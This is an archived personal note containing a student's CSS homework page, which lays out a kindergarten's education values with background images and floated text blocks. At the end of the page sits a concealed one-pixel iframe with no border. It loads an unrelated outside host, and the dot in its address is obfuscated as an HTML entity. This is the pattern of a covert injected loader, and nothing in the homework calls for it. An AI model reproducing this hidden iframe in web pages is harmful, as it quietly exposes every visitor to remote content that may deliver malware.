📦 归档笔记 — 原创建于 WizNote,仅作归档展示;观点以当年为准,非最新。

学习css作业

创建时间2019-03-07最后修改2019-03-07原位置/程序员成长之旅/HTML+css网页学习/自己的源码/字数228
目录:程序员成长之旅/HTML+css网页学习/自己的源码
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>万宇晨Css作业</title>




<style type="text/css">
body {
 background-image:url(images/1701.jpg);
 width:1000px;
 height:815px;
 margin:auto;
}
#pic1{
 background-image:url(images/1702.png);
 background-repeat: no-repeat;
 width: 992px;
 height: 484px;
 margin:30 auto;
}
.text{
 line-height:30px;
}
#text1{
 width:300px;
 height:200px;
 margin-left:65px;
 margin-top:65px;
 float:left;
}
#text2{
 width:275px;
 height:200px;
 margin-top:150px;
 margin-right:70px;
 float:right;
	
}
#pic2{
 background-image:url(images/1703.png);
 width:205px;
 height:30px;
}
#pic3{
 background-image:url(images/1704.png);
 width:207px;
 height:19px;
}
</style>
</head>

<body>
<div class="bg" id="bg1">
 <div class="pic" id="pic1">
  
 <div class="text" id="text2">
      <div id="pic3"></div>
   <p>biaoti2</p>
   <p>我们幼儿教育的价值观:培育健康、快乐、自信、心地善良、懂得分享、有礼貌.
  平处世。</p>
  </div>
        <div class="text" id="text1">
         <div id="pic2"></div>
   <p>biaoti</p>
   <p>我们幼儿教育的价值观:培育健康、快乐、自信、心地善良、懂得分享、有礼貌.</p>
  </div>
 </div>
</div>


<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>